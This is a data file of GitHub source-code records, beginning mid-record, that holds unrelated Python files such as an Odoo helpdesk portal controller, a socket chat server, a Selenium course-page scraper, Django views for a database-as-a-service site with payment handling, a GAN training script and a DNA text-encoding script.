('message', 'all'):\n discussion_subtype_id = request.env.ref('mail.mt_comment').id\n search_domain = OR([search_domain, [('message_ids.body', 'ilike', search),\n ('message_ids.subtype_id', '=', discussion_subtype_id)]])\n if search_in in ('status', 'all'):\n search_domain = OR([search_domain, [('stage_id', 'ilike', search)]])\n domain = AND([domain, search_domain])\n\n # pager\n partner = request.env.user.partner_id\n domain += self.custom_helpdesk_domain()\n\n tickets_count = request.env['helpdesk.ticket'].sudo().search_count(domain)\n pager = portal_pager(\n url=\"/my/tickets\",\n url_args={'date_begin': date_begin, 'date_end': date_end, 'sortby': sortby, 'search_in': search_in,\n 'search': search, 'groupby': groupby, 'filterby': filterby},\n total=tickets_count,\n page=page,\n step=self._items_per_page\n )\n\n tickets = request.env['helpdesk.ticket'].sudo().search(domain, order=order, limit=self._items_per_page,offset=pager['offset'])\n request.session['my_tickets_history'] = tickets.ids[:100]\n\n if groupby == 'stage':\n grouped_tickets = [request.env['helpdesk.ticket'].concat(*g) for k, g in\n groupbyelem(tickets, itemgetter('stage_id'))]\n else:\n grouped_tickets = [tickets]\n\n values.update({\n 'date': date_begin,\n 'grouped_tickets': grouped_tickets,\n 'page_name': 'ticket',\n 'default_url': '/my/tickets',\n 'pager': pager,\n 'searchbar_sortings': searchbar_sortings,\n 'searchbar_filters': searchbar_filters,\n 'searchbar_inputs': searchbar_inputs,\n 'searchbar_groupby': searchbar_groupby,\n 'sortby': sortby,\n 'groupby': groupby,\n 'search_in': search_in,\n 'search': search,\n 'filterby': filterby,\n })\n if partner and not partner.enable_helpdesk_portal_access:\n values = {}\n return request.render(\"helpdesk.portal_helpdesk_ticket\", values)\n\n\n\n","repo_name":"westlyou/astron-simulator","sub_path":"sme/sd_portal_access_helpdesk/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36958556166","text":"from xml.etree import ElementTree as etree\nfrom GAST import GAST\nimport clang.cindex\nfrom clang.cindex import CursorKind\nimport csv\nimport os\n\nclass Cpp_Ast(GAST):\n\n def __init__(self, root, filename):\n self.root = root\n self.filename = filename\n reader = csv.reader(open(os.getcwd()+\"/media/translation_cpp.csv\", \"r\"), delimiter='\\t')\n self.gast_dict = {rows[0]:rows[1] for rows in reader}\n self.ignore = [\"(\", \")\", \";\", \"{\", \"}\"]\n self.ops = [\"++\", \"--\", \"~\", \"!\", \"+\", \"-\", \"&\", \"*\", \"%\", \"/\", \"<<\", \">>\", \"<\", \">\", \"<=\", \">=\", \"==\", \"!=\", \"&\", \"^\", \"|\", \"&&\", \"||\", \"=\", \"*=\", \"/=\", \"%=\", \"+=\", \"-=\", \">>=\", \"<<=\", \"&=\", \"^=\", \"|=\", \"?\", \":\"]\n self.branchList = [\"if\", \"while\", \"for\", \"case\"]\n self.totalBranches = 0\n\n def getRoot(self):\n return self.root\n\n def translate(self, node, name):\n if name in self.gast_dict:\n return self.gast_dict[name]\n else:\n return \"Unknown\"\n\n def str_node(self, node, tag):\n tag.set(\"lineno\", str(node.location.line))\n tag.set(\"col_offset\", str(node.location.column))\n \n tokenNum = opNum = 0\n\n if node.label == \"BinaryOperator\":\n tmp = etree.SubElement(tag, \"BinaryOperatorMeta\")\n\n if node.label == \"UnaryOperator\":\n tmp = etree.SubElement(tag, \"UnaryOperatorMeta\")\n\n tokenNum = 0\n branchCount = 0\n for x in node.get_tokens():\n identifier = str(x.kind)[:str(x.kind).index('.')+1]\n if x.spelling in self.ignore:\n continue\n if ((node.kind == CursorKind.CXX_METHOD or\n node.kind == CursorKind.FUNCTION_DECL or\n node.kind == CursorKind.CONSTRUCTOR)\n and node.is_definition()):\n \n if x.spelling in self.branchList:\n tag.set(\"mccabe\", str(int(tag.get(\"mccabe\", default=\"0\"))+1))\n\n if node.label == \"BinaryOperator\":\n if x.spelling in self.ops:\n tmp2 = etree.SubElement(tmp, \"tor\")\n tmp2.text = x.spelling\n else:\n tmp2 = etree.SubElement(tmp, \"rand\")\n tmp2.text = x.spelling\n if node.label == \"UnaryOperator\":\n if x.spelling in self.ops:\n tmp2 = etree.SubElement(tmp, \"tor\")\n tmp2.text = x.spelling\n else:\n tmp2 = etree.SubElement(tmp, \"rand\")\n tmp2.text = x.spelling\n\n def ast_visit(self, node, pnode=None, level=0):\n identifier = str(node.kind)[:str(node.kind).index('.')]\n kind = str(node.kind)[str(node.kind).index('.')+1:]\n node.label = self.translate(node, kind)\n if level == 0:\n node.tag = etree.SubElement(self.root, node.label)\n else:\n node.tag = etree.SubElement(pnode.tag, node.label)\n self.str_node(node, node.tag)\n\n if identifier == \"CursorKind\":\n for c in node.get_children():\n if str(c.location.file) == self.filename:\n self.ast_visit(c, node, level=level+1)\n\n def fix_ops(self):\n for tags in self.root.iter('BinaryOperator'):\n tags.append(tags[0])\n\n for tags in self.root.iter('UnaryOperator'):\n tags.append(tags[0])\n \n","repo_name":"zmcnellis/codeEvalPrototype","sub_path":"media/cpp_ast.py","file_name":"cpp_ast.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18324095121","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(100000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n S = NLI()\n\n A = [0] * 1001\n for a in range(1, 1001):\n for b in range(1, 1001):\n s = 4*a*b + 3*a + 3*b\n if s < 1001:\n A[s] = 1\n\n ans = 0\n for s in S:\n if A[s] == 0:\n ans += 1\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC227/ABC227B.py","file_name":"ABC227B.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1702200361","text":"import socket\nimport threading\nfrom colorama import Fore, init\n\n# INITIALIZING COLORAMA\ninit()\n\n\n# DECLARING CONSTANTS\nPORT = 5050 # Here goes the port you want the people to connect to\nSERVER = \"0.0.0.0\" # Here goes the ip address you want the server to run on\nADDRESS = (SERVER, PORT)\nFORMAT = \"utf-8\"\nBUFSIZ = 512\n\n# DECLARING VARIABLES\nclients = []\nmessages = []\n\n# INITIALIZING SERVER\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDRESS)\n\n\ndef broadcast_username(username):\n for client in clients:\n client.send(f\" {username} has connected.\".encode(FORMAT))\n\n\ndef broadcast_message(username, message):\n for client in clients:\n client.send(f\" [{username}] {message}\".encode(FORMAT))\n\n\ndef broadcast_exit_message(username):\n for client in clients:\n client.send(f\" {username} has left the chat.\".encode(FORMAT))\n\n\ndef start():\n try:\n print(f\"[STARTING] Server is starting...\" + \"\\n\")\n server.listen()\n print(Fore.GREEN + f\"[LISTENING] Server is listening on {SERVER}\", Fore.RESET, \"\\n\")\n while True:\n conn, addr = server.accept()\n clients.append(conn)\n thread1 = threading.Thread(target=handle_clients, args=(conn, addr))\n thread1.start()\n except Exception as e:\n print(Fore.RED + \"[ERROR] Please try again\", Fore.RESET)\n\n\ndef handle_clients(connection, address):\n client_username = connection.recv(BUFSIZ).decode(FORMAT)\n broadcast_username(client_username)\n print(Fore.GREEN + f\"{client_username} has connected !\", Fore.RESET)\n while True:\n try:\n client_message = connection.recv(BUFSIZ).decode(FORMAT)\n if client_message == \"!1!2!3!\":\n broadcast_exit_message(client_username)\n print(Fore.RED + f\"{client_username} has left the chat.\" + Fore.RESET)\n connection.close()\n clients.remove(connection)\n break\n else:\n broadcast_message(client_username, client_message)\n print(f\"[{client_username}] {client_message}\")\n except:\n print(Fore.RED + f\"{client_username} has left the chat.\" + Fore.RESET)\n connection.close()\n clients.remove(connection)\n break\n\n\n\nstart()\n","repo_name":"kknownymouss/tkinter-Chatapp","sub_path":"server_side.py","file_name":"server_side.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72655131280","text":"from selenium import webdriver\nimport mytoken as token\n\n# headless mode\noptions = webdriver.FirefoxOptions()\noptions.add_argument('-headless')\n\nbrowser = webdriver.Firefox(options = options)\n\n# login\nbrowser.get(r'http://academic.tsinghua.edu.cn/')\nbrowser.find_element_by_name('userName').send_keys(token.username)\nbrowser.find_element_by_name('password').send_keys(token.pswd)\nbrowser.find_element_by_id('logining').click()\n\n# enter choose lesson page\nbrowser.get(r'http://zhjw.cic.tsinghua.edu.cn/xkBks.vxkBksJxjhBs.do?m=kkxxSearch&p_xnxq=2018-2019-2')\nwith open('pages/page1.html', 'w') as f:\n f.write(browser.page_source)\n\n# all pages\npages = 2\ntotal_pages = 226\nfor i in range(2,total_pages+1):\n browser.find_element_by_id('nextpage').click()\n with open('pages/page%s.html'%pages, 'w') as f:\n f.write(browser.page_source)\n print('%ssucceed!'%pages)\n pages = pages + 1\n","repo_name":"jcq15/chooseCourseHelper","sub_path":"getHtml.py","file_name":"getHtml.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"42846694639","text":"import logging\nimport os\nfrom tempfile import TemporaryDirectory\n\nfrom pyscreenshot.err import FailedBackendError\nfrom pyscreenshot.imcodec import codec\nfrom pyscreenshot.util import run_mod_as_subproc\n\nlog = logging.getLogger(__name__)\n\n\ndef childprocess_backend_version(backend):\n p = run_mod_as_subproc(\"pyscreenshot.cli.print_backend_version\", [backend])\n if p.return_code != 0:\n log.warning(p)\n raise FailedBackendError(p)\n\n return p.stdout\n\n\ndef childprocess_grab(backend, bbox):\n with TemporaryDirectory(prefix=\"pyscreenshot\") as tmpdirname:\n filename = os.path.join(tmpdirname, \"screenshot.png\")\n cmd = [\"--filename\", filename]\n if bbox:\n x1, y1, x2, y2 = map(str, bbox)\n bbox = \":\".join(map(str, (x1, y1, x2, y2)))\n cmd += [\"--bbox\", bbox]\n if backend:\n cmd += [\"--backend\", backend]\n if log.isEnabledFor(logging.DEBUG):\n cmd += [\"--debug\"]\n\n p = run_mod_as_subproc(\"pyscreenshot.cli.grab\", cmd)\n if p.return_code != 0:\n # log.debug(p)\n raise FailedBackendError(p)\n\n data = open(filename, \"rb\").read()\n data = codec[1](data)\n return data\n","repo_name":"ponty/pyscreenshot","sub_path":"pyscreenshot/childproc.py","file_name":"childproc.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":475,"dataset":"github-code","pt":"3"}
+{"seq_id":"18688579278","text":"import os\nimport codecs\nfrom setuptools import setup, find_packages\n\ndef read(fname):\n return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='django-periodformat',\n version='0.0.1',\n description='Filter helper for date period formating.',\n long_description = read('README.md'),\n author='David Charbonnier',\n author_email='dcharbonnier@gmail.com',\n url = 'https://github.com/oxys-net/django-periodformat',\n download_url='',\n packages=find_packages(),\n include_package_data=True,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n zip_safe = False,\n)","repo_name":"oysnet/django-periodformat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10986692246","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom urllib.parse import parse_qs\n\nstatus_code = int(parse_qs(os.environ.get('QUERY_STRING', ''), keep_blank_values=True).get('status-code', [200])[0])\nscript_url = os.environ.get('SCRIPT_URL', '')\nhttp_host = os.environ.get('HTTP_HOST', '')\n\nsys.stdout.write('status: {}\\r\\n'.format(status_code))\n\nif status_code == 200:\n sys.stdout.write(\n 'Content-Type: text/event-stream\\r\\n\\r\\n'\n 'data: hello\\n\\n'\n )\nelif status_code in [301, 302, 303, 307]:\n sys.stdout.write(\n 'Content-Type: text/html\\r\\n'\n 'Location: http://{}{}/simple-event-stream.asis\\r\\n\\r\\n'.format(http_host, '/'.join(script_url.split('/')[0:-1]))\n )\nelse:\n sys.stdout.write('Content-Type: text/html\\r\\n\\r\\n')","repo_name":"WebKit/WebKit","sub_path":"LayoutTests/http/tests/eventsource/resources/status-codes.py","file_name":"status-codes.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"}
+{"seq_id":"8843598839","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom . import connection\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login as auth_login\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom zeep import Client\nimport jdatetime\n\n\n\ntry:\n client = connection.Connection('root', 'root', '0.0.0.0', 6543)\nexcept:\n pass\n\n\n# Create your views here..\n# process on sign up page and return alert and rediret\ndef register_handler(request):\n global client\n fname=request.POST.get('firstname', False)\n lname=request.POST.get('lastname', False)\n email=request.POST.get('email', False)\n username = request.POST.get('username', False)\n password = request.POST.get('pass', False)\n password_repeat = request.POST.get('pass-repeat', False)\n if password == password_repeat:\n if username and password:\n client.create_user(username, password)\n User.objects.create_user(first_name=fname,last_name=lname,email=email,username=username, password=password,)\n messages.success(request, 'Your registration has been successfully completed')\n else:\n messages.error(request, 'Registration was encountered error')\n else:\n messages.warning(request, 'your password is not equal')\n\n return HttpResponseRedirect(reverse('movie:login'))\n\n\n# render login page\ndef login(request):\n return render(request, 'movie/login.html', {})\n\n\n# process on login page and redirect\ndef user_Authenticate(request):\n username = request.POST.get('uname', False)\n password = request.POST.get('psw', False)\n if username and password =='admin':\n return HttpResponseRedirect(reverse('movie:adminPage'))\n else:\n user = authenticate(request, username=username, password=password)\n if user is not None:\n auth_login(request, user)\n return HttpResponseRedirect(reverse('movie:profile'))\n\n else:\n messages.error(request, 'Your account is not logged in. Please register')\n return HttpResponseRedirect(reverse('movie:login'))\n\n\n# render index.html file\ndef profile(request):\n global client\n now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n top_name = request.user.username\n db_user = client.return_user_dbs(top_name)\n chart_items = client.chart_doughnut(top_name)\n if db_user == 'false':\n no_dbs = 'There are no databases'\n else:\n no_dbs = 'not null'\n Percentage = []\n if chart_items[0][0]!=None:\n if chart_items[0][4]==0:\n chart_items[0][4]=1\n\n for i in range(0, len(chart_items[0])-1):\n Percentage.append(round((chart_items[0][i] * 100) / chart_items[0][4], 2))\n total_cost=0\n if db_user=='false':\n total_cost=0\n else:\n for i in db_user:\n total_cost+=i[6]\n return render(request, 'gentelella/index.html',\n {'top_name': top_name, 'db_user': db_user, 'no_dbs': no_dbs, 'chart_items': chart_items[0],\n 'Percentage': Percentage,'now_date':now_date,'total_cost':total_cost})\n\n\n# render form.html file\ndef profiel_form(request):\n global client\n now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n top_name = request.user.username\n database_name = request.POST.get('db_name', False)\n if database_name:\n db = top_name + \"_\" + database_name\n client.insert_db_info(top_name, db)\n client.create_database(db)\n return HttpResponseRedirect(reverse('movie:profiel_form'))\n\n db_user = client.return_user_dbs(top_name)\n return render(request, 'gentelella/form.html', {'top_name': top_name, 'db_user': db_user,'now_date':now_date})\n\n\ndef create_db_info(request):\n global client\n client.create_db_info()\n return HttpResponse('Done')\n\n\ndef send_request(request):\n global client\n db_user = client.return_user_dbs(request.user.username)\n total_cost=0\n if db_user=='false':\n total_cost=0\n else:\n for i in db_user:\n total_cost+=i[6]\n MERCHANT = '00000000-0000-0000-0000-000000000000'\n client1 = Client('https://sandbox.zarinpal.com/pg/services/WebGate/wsdl')\n amount = total_cost # Toman / Required\n description = \"تراکنش استفاده از سیستم دیتابیس به عنوان خدمت ابری\"# Required\n email = 'DBAS@db.ir' # Optional\n mobile = '09123456789' # Optional\n CallbackURL = 'http://93.118.97.199:8085/verify/' # Important: need to edit for realy server.\n result = client1.service.PaymentRequest(MERCHANT, amount, description, email, mobile, CallbackURL)\n if result.Status == 100:\n return redirect('https://sandbox.zarinpal.com/pg/StartPay/' + str(result.Authority))\n else:\n return HttpResponse('Error code: ' + str(result.Status))\n\n\n\ndef verify(request):\n global client\n myUser=request.user.username\n db_user = client.return_user_dbs(myUser)\n total_cost=0\n if db_user=='false':\n total_cost=0\n else:\n for i in db_user:\n total_cost+=i[6]\n MERCHANT = '00000000-0000-0000-0000-000000000000'\n client1 = Client('https://sandbox.zarinpal.com/pg/services/WebGate/wsdl')\n amount = total_cost # Toman / Required\n if request.GET.get('Status') == 'OK':\n result = client1.service.PaymentVerification(MERCHANT, request.GET['Authority'], amount)\n if result.Status == 100:\n client.payment_action(myUser)\n # return HttpResponse('Transaction success.\\nRefID: ' + str(result.RefID))\n\n return HttpResponseRedirect(reverse('movie:profile'))\n elif result.Status == 101:\n return HttpResponse('Transaction submitted : ' + str(result.Status))\n else:\n return HttpResponse('Transaction failed.\\nStatus: ' + str(result.Status))\n else:\n return HttpResponse('Transaction failed or canceled by user')\n\n\n\ndef adminPage(request):\n now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n users=User.objects.all()\n # usernames = User.objects.values_list('email', flat=True)\n for i in users:\n print (i.email)\n return render(request,'gentelella/tables.html',{'now_date':now_date,'users':users})\n\ndef show_info(request,user_name):\n global client\n now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n db_user = client.return_user_dbs(user_name)\n chart_items = client.chart_doughnut(user_name)\n if db_user == 'false':\n no_dbs = 'There are no databases'\n else:\n no_dbs = 'not null'\n Percentage = []\n if chart_items[0][0]!=None:\n if chart_items[0][4]==0:\n chart_items[0][4]=1\n\n for i in range(0, len(chart_items[0])-1):\n Percentage.append(round((chart_items[0][i] * 100) / chart_items[0][4], 2))\n total_cost=0\n if db_user=='false':\n total_cost=0\n else:\n for i in db_user:\n total_cost+=i[6]\n return render(request, 'gentelella/index.html',\n {'top_name': user_name, 'db_user': db_user, 'no_dbs': no_dbs, 'chart_items': chart_items[0],\n 'Percentage': Percentage,'now_date':now_date,'total_cost':total_cost})\n\n\n\n\n\n\ndef create_database(request):\n global client\n # client.create_database('nano')\n client.use_database('sajjad_userInfo')\n client.create_table('j', {'id': 'int', 'name': 'text'}, ['id'])\n # client.create_table('jamali', {'id': 'int', 'first_name': 'text', 'last_name': 'text', 'date_of_birth': 'text'},\n # ['id'])\n # client.create_table('jamshidi',\n # {'id': 'int', 'name': 'text', 'director_id': 'int', 'country_id': 'int', 'year': 'text',\n # 'description': 'text'}, ['id'])\n return HttpResponse('Done')\n\ndef index(request):\n global client\n client.use_database('movie')\n movie_table = client.table('movie')\n movies = movie_table.get_item()\n\n country_table = client.table('country')\n countries = country_table.get_item()\n\n director_table = client.table('director')\n directors = director_table.get_item()\n\n for i in range(0, len(movies)):\n for country in countries:\n if int(country['id']) == int(movies[i]['country_id']):\n movies[i]['country_name'] = country['name']\n for director in directors:\n if int(director['id']) == int(movies[i]['director_id']):\n movies[i]['director_name'] = director['first_name'] + \" \" + director['last_name']\n return render(request, 'movie/index.html', {'movies': movies})\n\n\ndef country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n table = client.table('ahmadi')\n rows = table.get_item()\n return render(request, 'movie/country.html', {'rows': rows})\n\n\ndef add_country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n # client.use_database('movie')\n table = client.table('ahmadi')\n id = request.POST['id']\n name = request.POST['name']\n table.put_item({'id': int(id), 'name': name})\n return HttpResponseRedirect(reverse('movie:country'))\n\n\ndef update_country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n table = client.table('ahmadi')\n id = request.POST['id']\n name = request.POST['name']\n table.update_item({'name': name}, {'id': int(id)})\n return HttpResponseRedirect(reverse('movie:country'))\n\n\ndef delete_country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n table = client.table('ahmadi')\n id = request.GET['id']\n table.delete_item({'id': int(id)})\n return HttpResponseRedirect(reverse('movie:country'))\n\n\ndef director(request):\n global client\n client.use_database('movie')\n table = client.table('director')\n rows = table.get_item()\n return render(request, 'movie/director.html', {'rows': rows})\n\n\ndef add_director(request):\n global client\n client.use_database('movie')\n table = client.table('director')\n id = request.POST['id']\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n date_of_birth = request.POST['date_of_birth']\n table.put_item({'id': int(id), 'first_name': first_name, 'last_name': last_name, 'date_of_birth': date_of_birth})\n return HttpResponseRedirect(reverse('movie:director'))\n\n\ndef delete_director(request):\n global client\n client.use_database('movie')\n table = client.table('director')\n id = request.GET['id']\n table.delete_item({'id': int(id)})\n return HttpResponseRedirect(reverse('movie:director'))\n\n\ndef movie(request):\n global client\n client.use_database('movie')\n table1 = client.table('movie')\n rows = table1.get_item()\n\n table2 = client.table('director')\n directors = table2.get_item()\n\n table3 = client.table('country')\n countries = table3.get_item()\n return render(request, 'movie/movie.html', {'rows': rows, 'directors': directors, 'countries': countries})\n\n\ndef add_movie(request):\n global client\n client.use_database('movie')\n table = client.table('movie')\n id = int(request.POST['id'])\n name = request.POST['name']\n director_id = int(request.POST['director_id'])\n country_id = int(request.POST['country_id'])\n year = request.POST['year']\n description = request.POST['description']\n table.put_item({'id': id, 'name': name, 'director_id': director_id, 'country_id': country_id, 'year': year,\n 'description': description})\n return HttpResponseRedirect(reverse('movie:movie'))\n\n\ndef delete_movie(request):\n global client\n client.use_database('movie')\n table = client.table('movie')\n id = request.GET['id']\n table.delete_item({'id': int(id)})\n return HttpResponseRedirect(reverse('movie:movie'))\n\n\n","repo_name":"rezakiani73/database_as_service","sub_path":"movies/movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28238897031","text":"from __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport models\nfrom models import *\n\nFLAGS = tf.flags.FLAGS\ntf.flags.DEFINE_integer(\"batch_size\", \"64\", \"batch size for training\")\ntf.flags.DEFINE_float(\"learning_rate\", \"2e-5\", \"learning rate for optimizers\")\ntf.flags.DEFINE_float(\"optimizer_param\", \"0.5\", \"beta1 for adam-decay for RMSProp\")\ntf.flags.DEFINE_float(\"iterations\", \"500000\", \"training iterations\")\ntf.flags.DEFINE_string(\"optimizer\", \"RMSProp\", \"RMSProp/Adam\")\ntf.flags.DEFINE_string(\"loss_type\", \"wasserstein_l2_loss\", \"wasserstein/imp_wasserstein/wasserstein_l1_loss/wasserstein_l2_loss/imp_wasserstein_l2_loss\")\n\ndef main(argv=None):\n discriminator_dims = [3, 16, 64, 1]\n kernel_encoder = [5,7,9]\n kernel_decoder = [9,7,5]\n encoder_dims = [64,16,3]\n decoder_dims = [16,32,3]\n\n print(\"stage 1\")\n model = models.GAN_AE(FLAGS.batch_size,\n clip_values=(-0.01, 0.01), disc_iterations=5, num_train_data=38400, num_test_data=6400, folder='wgan_l2')\n print(\"stage 2\")\n model.create_model(discriminator_dims, kernel_encoder, kernel_decoder, encoder_dims, decoder_dims, \"RMSProp\", FLAGS.learning_rate,\n FLAGS.optimizer_param, FLAGS.loss_type)\n\n print(\"stage 3\")\n model.train_model(FLAGS.batch_size, int(FLAGS.iterations))\n\n discriminator_dims = [3, 16, 64, 1]\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"scelesticsiva/Neural-Networks-for-Image-Compression","sub_path":"GAN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"}
+{"seq_id":"16736045461","text":"import string\n\nasciilst = list(string.printable)\nalphabet = dict(zip(asciilst, range(1, 101)))\naddresses = []\n\nchars = ['a','g','c','t']\nstart = ['a','a','a','a','a']\nadnacii = {}\nextra = []\ninitial = []\n\ndef last_char(lst):\n for i in chars:\n start[4] = i\n initial.append(start[:])\n\ndef nextlast_char(lst):\n for i in chars:\n start[3] = i\n last_char(lst)\n\ndef nnlchar(lst):\n for i in chars:\n start[2] = i\n nextlast_char(lst)\n\ndef nnnlchar(lst):\n for i in chars:\n start[1] = i\n nnlchar(lst)\n\ndef nnnnlchar(lst):\n for i in chars:\n start[0] = i\n nnnlchar(lst)\n\ndef join(lst):\n for i in lst:\n lst[lst.index(i)] = ''.join(i)\n\ndef check(lst):\n lst[:] = [x for x in lst if 'tt' not in x]\n lst[:] = [x for x in lst if 'gg' not in x]\n lst[:] = [x for x in lst if 'aa' not in x]\n lst[:] = [x for x in lst if 'cc' not in x]\n\nnnnnlchar(start)\njoin(initial)\ncheck(initial)\n\ndef assign(lst, asciilst):\n x = 101\n zipl = lst[:x]\n return dict(zip(asciilst, zipl))\n\ndef assign2(lst, asciilst):\n x = 201\n y = 100\n zipl = lst[y:x]\n return dict(zip(asciilst, zipl))\n\ndef assign3(lst, asciilst):\n x = 301\n y = 200\n zipl = lst[y:x]\n return dict(zip(asciilst, zipl))\n\nadnacii = assign(initial, asciilst)\nadnacii2 = assign2(initial, asciilst)\nadnacii3 = assign3(initial, asciilst)\naSearch = dict(zip(adnacii.values(), adnacii.keys()))\na2Search = dict(zip(adnacii2.values(), adnacii2.keys()))\na3Search = dict(zip(adnacii3.values(), adnacii3.keys()))\n\ndef extraassign(lst):\n x = 307\n return lst[x:]\n\nextraassign(initial)\n\nadnacii[' end_str '] = initial[301]\nadnacii2[' end_str '] = initial[302]\nadnacii3[' end_str '] = initial[303]\nadnacii[' ad_b '] = initial[304]\nadnacii[' ad_e '] = initial[305]\nadnacii[' full_end '] = initial[306]\nadnacii[' spacer1 '] = 'c'\nadnacii[' spacer2 '] = 'a'\n\ndef three_con(txt, asys):\n lst = []\n for i in txt:\n lst.append(asys[i])\n x = 0\n seq = lst[x:x+5]\n lchar = ''\n return lst\n\ndef address():\n global addresses\n ad1 = ''\n rem = input(\"Would you like to reset the address list to empty? y or n: \")\n if rem == 'y':\n addresses = []\n if len(addresses) == 0:\n ad1 = 0\n else:\n ad1 = addresses[-1] + 1\n addresses.append(ad1)\n ad1 = adnacii[' ad_b '] + adnacii[str(ad1)] + adnacii[' ad_e ']\n return ad1\n\ndef converter():\n txt = input(\"What text would you like to be converted? \")\n dnatxt = three_con(txt, adnacii)\n checksum = 0\n x = 0\n seq = dnatxt[x:x+5]\n for seq in dnatxt:\n checksum = checksum + alphabet[aSearch[seq]]\n x+=6\n seq = dnatxt[x:x+5]\n checksum = list(str(checksum))\n csencode = []\n for i in checksum:\n csencode.append(adnacii[i])\n checksum = csencode\n dnatxt2 = three_con(txt, adnacii2)\n dnatxt3 = three_con(txt, adnacii3)\n endtxt = list(address()) + dnatxt + list(adnacii[' end_str ']) + dnatxt2 + list(adnacii2[' end_str ']) + dnatxt3 + list(adnacii3[' end_str ']) + checksum + list(adnacii[' full_end '])\n endtxt = list(''.join(endtxt))\n x = 0\n seq = endtxt[x:x+5]\n print(endtxt)\n while ''.join(seq) != adnacii[' full_end ']:\n print(seq)\n lchar = seq[-1]\n if lchar == 'a' or lchar == 'g' or lchar == 't':\n endtxt[x+5:] = list(adnacii[' spacer1 ']) + endtxt[x+5:]\n else:\n endtxt[x+5:] = list(adnacii[' spacer2 ']) + endtxt[x+5:]\n x+=5\n seq = endtxt[x:x+5]\n endtxt = ''.join(endtxt)\n print(endtxt)\n return endtxt\n\ndef checkSeq(a1l, a2l, a3l, data):\n if a1l == a2l == a3l:\n return ''.join(a1l)\n else:\n cs1 = 0\n for i in a1l:\n cs1 = cs1 + alphabet[i]\n cs2 = 0\n for i in a2l:\n cs2 = cs2 + alphabet[i]\n cs3 = 0\n for i in a3l:\n cs3 = cs3 + alphabet[i]\n checksum = []\n x = data.index(adnacii3[' end_str ']) + 6\n seq = data[x:x+5]\n while seq != adnacii[' full_end ']:\n checksum.append(aSearch[seq])\n x+=6\n seq = data[x:x+5]\n checksum = sum(checksum)\n if cs1 == checksum:\n return ''.join(a1l)\n elif cs2 == checksum:\n return ''.join(a2l)\n elif cs3 == checksum:\n return ''.join(a3l)\n else:\n print(\"Opt. 1: \" + ''.join(a1l))\n print(\"Opt. 2: \" + ''.join(a2l))\n print(\"Opt. 3: \" + ''.join(a3l))\n wr = input(\"Which one makes the most sense - opt1, opt2, or opt3? \")\n if wr == 'opt1':\n return ''.join(a1l)\n elif wr == 'opt2':\n return ''.join(a2l)\n else:\n return ''.join(a3l)\n\ndef reader(data):\n a1l = []\n x = data.index(adnacii[' ad_e ']) + 6\n seq = data[x:x+5]\n while seq != adnacii[' end_str ']:\n a1l.append(aSearch[seq])\n x+=6\n seq = data[x:x+5]\n x+=6\n seq = data[x:x+5]\n a2l = []\n while seq != adnacii2[' end_str ']:\n a2l.append(a2Search[seq])\n x+=6\n seq = data[x:x+5]\n x+=6\n seq = data[x:x+5]\n a3l = []\n while seq != adnacii3[' end_str ']:\n a3l.append(a3Search[seq])\n x+=6\n seq = data[x:x+5]\n return checkseq(a1l, a2l, a3l, data)\n\ndef openSpecial():\n file = input(\"Which file? \")\n try:\n with open(file, 'r') as myfile:\n data = myfile.read()\n print(reader(data))\n except FileNotFoundError:\n print(\"file not found\")\n return 